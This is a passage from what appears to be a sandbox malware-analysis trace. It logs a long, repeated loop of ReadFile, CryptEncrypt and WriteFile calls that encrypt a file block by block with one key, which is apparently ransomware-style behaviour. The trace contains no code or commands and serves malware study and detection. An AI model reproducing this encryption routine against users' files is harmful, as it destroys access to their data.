lpBuffer=0x2f2d688*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0278.920] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.922] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.922] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.966] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.967] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.967] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.967] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.967] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.968] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.968] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.968] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.968] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.968] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.968] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.968] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.968] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.968] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.968] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.968] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.968] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.969] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.969] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.969] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.969] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.969] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.969] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.969] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.969] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.969] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.969] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.969] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.969] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.969] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.970] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.970] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.970] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.970] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.970] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.970] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.970] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.970] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.970] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.970] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.970] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.970] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.970] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.970] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.971] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.971] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.971] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.971] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.971] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.971] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.971] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.971] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.971] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.971] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.971] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.971] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.972] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.972] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.972] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.972] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.972] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.972] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.972] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.972] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.972] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.972] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.972] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.972] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.972] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.972] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.973] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.973] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.973] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.973] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.973] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.973] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.973] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.973] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.973] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.973] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.973] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.973] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.973] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.974] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.974] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.974] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.974] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.974] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.974] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.974] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.974] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.974] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.974] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.974] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.974] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.974] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, 